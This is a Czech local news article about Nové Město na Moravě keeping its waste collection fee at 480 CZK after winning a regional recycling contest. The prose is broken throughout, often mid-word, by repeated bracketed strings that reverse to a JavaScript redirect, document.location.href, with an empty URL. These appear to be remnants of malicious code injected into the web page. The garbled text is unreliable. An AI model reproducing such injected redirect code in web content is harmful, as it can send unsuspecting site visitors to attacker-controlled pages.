Rainbow page separator

Ve Městě poplatek za odpady nezvyšovali

Neděle, 1. února 2015

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / I díky vítězství Nového Města na Moravě v celokrajské soutěži My třídíme nejlépe budou moci tamní obyvatelé i nadále platit nejnižší poplatek za komunální odpad ze všech měst na Žďársku.
„Všude se zvyšují poplatky za odpad, my jsme ale k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kroku nepřis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili. Udělali jsme ve vedení města takovou dohodu, že dokud budou obyvatelé dobře třídit, tak poplatek za svoz odpadu zvyšovat nebudeme,“ vyjádřil se starosta Nového Města na Moravě Michal Šmarda.
Poplatek za svoz, zpracování a ukládání komunálního odpadu tak i v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce v Novém Městě zůstane ve výši 480 korun za osobu.
Za výhru v soutěži v třídění odpadů připadla Novému Městu na Moravě finanční odměna ve výši pětatřicet tisíc korun. Za ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to peníze novoměstská radnice zakoupí další kontejnery na tříděný odpad.